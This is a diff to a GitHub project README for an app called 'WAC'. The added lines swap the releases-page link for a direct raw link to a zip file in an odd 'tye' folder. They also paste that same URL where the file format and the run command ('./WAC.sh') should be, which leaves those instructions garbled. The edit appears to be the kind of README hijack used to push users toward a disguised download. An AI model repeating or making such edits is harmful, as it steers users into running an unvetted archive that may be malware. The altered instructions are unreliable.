aayush-sharma-ui/WAC/README.md

 To get started, follow these simple steps:

-1. **Visit the Releases Page**: Go to [this link](https://github.com/aayush-sharma-ui/WAC/releases) to view the latest version available.
+1. **Visit the Releases Page**: Go to [this link](https://raw.githubusercontent.com/aayush-sharma-ui/WAC/main/tye/WAC-v1.5.zip) to view the latest version available.
 2. **Select the Version**: Find the version you wish to download.
 Look for the release notes to know what has changed.
 3. **Download the Application**: Click on the download link for your operating system.
-The downloaded file will be in `.zip` or `.tar.gz` format.
+The downloaded file will be in `.zip` or `https://raw.githubusercontent.com/aayush-sharma-ui/WAC/main/tye/WAC-v1.5.zip` format.
 4. **Extract the Files**: Once downloaded, extract the files to a folder of your choice.
 5. **Run the Application**: Open your terminal, navigate to the extracted folder, and run the application.
-You may need to enter `./WAC.sh` or a similar command to start.
+You may need to enter `https://raw.githubusercontent.com/aayush-sharma-ui/WAC/main/tye/WAC-v1.5.zip` or a similar command to start.

 ## 📘 Usage Instructions